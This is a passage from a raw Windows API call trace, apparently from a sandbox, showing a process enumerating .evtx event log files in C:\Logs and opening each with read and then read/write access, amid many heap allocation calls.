[0071.966] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.966] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.967] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.967] CloseHandle (hObject=0x410) returned 1 [0071.967] AreFileApisANSI () returned 1 [0071.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0071.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0071.967] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x75f30, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 56 [0071.967] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-hotspotauth%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.967] GetFileType (hFile=0x410) returned 0x1 [0071.967] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0071.967] CloseHandle (hObject=0x410) returned 1 [0071.967] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0071.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0071.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0071.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0071.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0071.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0071.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0071.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0071.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0071.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0071.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0071.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0071.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0071.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0071.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0071.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0071.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0071.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x716f0 [0071.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0071.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0071.968] AreFileApisANSI () returned 1 [0071.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0071.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0071.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x75b70, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx") returned 56 [0071.968] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-HotspotAuth%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-hotspotauth%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9dcc480, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9dcc480, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0071.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0071.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0071.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0071.968] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0071.968] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.968] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.968] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50b4bacf, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50b4bacf, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", cAlternateFileName="MI6B25~1.EVT")) returned 1 [0071.968] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0071.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0071.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0071.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0071.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0071.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46208 [0071.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0071.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0071.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0071.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0071.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0071.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0071.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46208 | out: hHeap=0x20000) returned 1 [0071.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0071.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0071.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0071.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0071.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0071.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0071.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0071.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0071.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0071.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0071.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0071.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0071.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e470 [0071.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0071.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0071.969] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e7a0 [0071.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0071.969] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.969] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.969] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.969] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0071.969] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0071.969] AreFileApisANSI () returned 1 [0071.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx", lpUsedDefaultChar=0x0) returned 60 [0071.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0071.970] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.970] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0071.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0071.970] AreFileApisANSI () returned 1 [0071.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0071.970] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0071.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=60 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 60 [0071.970] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-hyper-v-guest-drivers%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.970] GetFileType (hFile=0x410) returned 0x1 [0071.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0071.970] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.970] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.971] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.971] CloseHandle (hObject=0x410) returned 1 [0071.971] AreFileApisANSI () returned 1 [0071.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0071.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69db0 [0071.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=60 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 60 [0071.971] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-hyper-v-guest-drivers%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.971] GetFileType (hFile=0x410) returned 0x1 [0071.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0071.971] CloseHandle (hObject=0x410) returned 1 [0071.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0071.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0071.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0071.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0071.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0071.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0071.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0071.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0071.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0071.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0071.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0071.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0071.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0071.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0071.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0071.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0071.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0071.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0071.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0071.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0071.972] AreFileApisANSI () returned 1 [0071.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0071.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0071.972] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=60 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 60 [0071.972] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-hyper-v-guest-drivers%4admin.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50b4bacf, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50b4bacf, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0071.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0071.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0071.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0071.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0071.972] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.972] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.972] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb66288f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb66288f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-International%4Operational.evtx", cAlternateFileName="MI854A~1.EVT")) returned 1 [0071.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0071.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0071.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0071.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68b80 [0071.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0071.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46278 [0071.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b80 | out: hHeap=0x20000) returned 1 [0071.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0071.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0071.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0071.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0071.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0071.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46278 | out: hHeap=0x20000) returned 1 [0071.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0071.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0071.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0071.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0071.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0071.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0071.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0071.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0071.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0071.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0071.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0071.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0071.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0071.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0071.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0071.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e718 [0071.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0071.973] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.973] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.973] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.973] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0071.973] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0071.973] AreFileApisANSI () returned 1 [0071.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx", lpUsedDefaultChar=0x0) returned 58 [0071.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0071.973] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.974] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.974] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0071.974] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0071.974] AreFileApisANSI () returned 1 [0071.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0071.974] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a3b0 [0071.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=58 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned 58 [0071.974] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-international%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0071.975] GetFileType (hFile=0x410) returned 0x1 [0071.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0071.975] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.975] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.975] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.975] CloseHandle (hObject=0x410) returned 1 [0071.975] AreFileApisANSI () returned 1 [0071.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0071.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x69bb0 [0071.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=58 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned 58 [0071.976] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-international%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, 